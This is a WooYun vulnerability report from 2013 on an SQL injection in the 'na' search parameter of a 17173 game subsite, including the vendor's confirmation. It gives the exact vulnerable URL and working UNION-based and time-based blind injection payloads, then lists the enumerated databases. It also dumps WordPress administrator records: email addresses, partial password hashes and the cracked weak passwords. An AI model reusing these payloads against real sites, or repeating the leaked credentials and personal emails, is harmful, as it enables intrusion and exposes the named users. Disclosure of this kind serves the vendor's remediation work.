当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044101

漏洞标题:17173游戏某分站注入泄漏敏感信息

相关厂商:17173游戏

漏洞作者: D&G

提交时间:2013-11-26 18:54

修复时间:2014-01-10 18:54

公开时间:2014-01-10 18:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-26: 细节已通知厂商并且等待厂商处理中
2013-11-26: 厂商已经确认,细节仅向厂商公开
2013-12-06: 细节向核心白帽子及相关领域专家公开
2013-12-16: 细节向普通白帽子公开
2013-12-26: 细节向实习白帽子公开
2014-01-10: 细节向公众公开

简要描述:

sql注入。

详细说明:

http://zq.17173.com/dnf/act1228/list.php?button=%e6%90%9c%e7%b4%a2&na=&ord=11&tp=1
na参数。搜索注入。

Place: GET
Parameter: na
Type: UNION query
Title: MySQL UNION query (random number) - 13 columns
Payload: button=%e6%90%9c%e7%b4%a2&na=-7113 UNION ALL SELECT 3219,3219,3219,CONCAT(0x3a7670683a,0x6f667742686670634161,0x3a6c65723a),3219,3219,3219,3219,3219,3219,3219,3219,3219#&ord=11&tp=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: button=%e6%90%9c%e7%b4%a2&na=(SELECT (CASE WHEN (1154=1154) THEN SLEEP(5) ELSE 1154*(SELECT 1154 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&ord=11&tp=1


available databases [6]:                                                       
[*] information_schema
[*] mnq
[*] otherdb
[*] shendeng
[*] wordpress
[*] zqdb


权限不高。不过可惜泄露了一个wordpress库。。。。。wordpress的库信息还是比较重要的。可以进行后续的信息收集和渗透测试。表明危害就可以。这里就不继续了。

漏洞证明:

打过码的wordpress管理员信息。各种弱密码。

+----+---------------+-----------------------------------------------+---------------+----------------------------+-------------+---------------+---------------+---------------------+----------------------+
| ID | user_url | user_pass | user_login | user_email | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+---------------+-----------------------------------------------+---------------+----------------------------+-------------+---------------+---------------+---------------------+----------------------+
| 1 | <blank> | $P$B2bk949KU5fE/ (123456) | admin | wen@cyou-inc.com | 0 | in | ad | 2012-08-29 06:43:00 | <blank> |
| 2 | <blank> | $P$BN1vExVNv/ALIhewz/ (1456) | chenenyuan | enyuanchen@cyou-inc.com | 0 | chenenyuan | chenenyuan | 2012-08-31 09:35:18 | <blank> |
| 4 | <blank> | $P$Blaw63f0JjWfrZZaSG0y/ (Jhua) | Joshua | zhengjuntc@yahoo.com.cn | 0 | 亚 | joa | 2012-09-05 02:10:35 | vtfleXUZJnTudNc |

修复方案:

求rank

版权声明:转载请注明来源 D&G@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-11-26 19:54

厂商回复:

谢谢。我们马上修正。

最新状态:

暂无


漏洞评价:

评论